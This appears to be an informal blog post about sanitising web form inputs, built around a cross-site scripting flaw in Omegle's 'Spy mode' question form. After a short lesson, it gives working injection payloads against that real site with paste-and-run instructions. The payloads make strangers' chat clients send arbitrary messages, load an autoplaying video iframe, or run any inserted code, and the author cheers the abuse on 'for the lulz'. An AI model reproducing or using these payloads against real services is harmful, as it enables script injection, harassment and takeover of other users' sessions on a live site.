The Importance of sanitising your user inputs

Inputting Raw User Data is Never a Good Idea

Unsanitized User Inputs can Lead to Awkward Code Injects

Morning, Internets.
So today lets talk about how important it is to completely distrust everyone on the internet and everything that they say.
Specifically I am talking about user inputs on web forms.
If you fail to sanitise the inputs you allow users to make then you are a fool. You leave yourself open to all kinds of bad stuff including but not limited to.. MySQL Injects and Cross Site Scripting.
A hard and fast rule is to say any time you give your users the chance to input data in any way, sanitise the shit out of it before you execute it.
The reason I chose to mention this today is i came across a big website that has completely failed to do that and is being abused for the lulz.

Omegle.com is a well known chat-roulette style website that offers people the chance to chat with strangers on a random ad-hoc basis.
Recently they introduced the chance for you to suggest a question for 2 strangers to discuss whilst you watch.
Sadly they absolutely forgot to sanitise the input on the question suggestion form and absolute anarchy is ensuing…
For example:
This is what happens when you don't Sanitize your inputs

This is what happens when you don't Sanitize your inputs

It’s not just text you have the ability to inject pretty much any code into the chat.
Another example here:
Rick Rolled

Rick Rolled

Simply head over to Omegle.com and select “Spy mode (beta)”
then paste the following into the question box:

\”)); function l(x){return document.getElementsByClassName(x)[0];} l(‘chatmsg’).value=’YOUR MESSAGE HERE‘; l(‘sendbtn’).click();}catch( e ){} //

Or for a video:

\”)); document.getElementsByClassName(‘logitem’)[1].innerHTML='<iframe width=”425″ height=”349″ src=”http://www.youtube.com/embed/yzC4hFK5P3g?autoplay=1“>‘; }catch( e ){} //

Or for any other code:
\”)); document.getElementsByClassName(‘logitem’)[1].innerHTML=’INSERT CODE HERE‘; }catch( e ){} //

Omegle you are fail (;_;)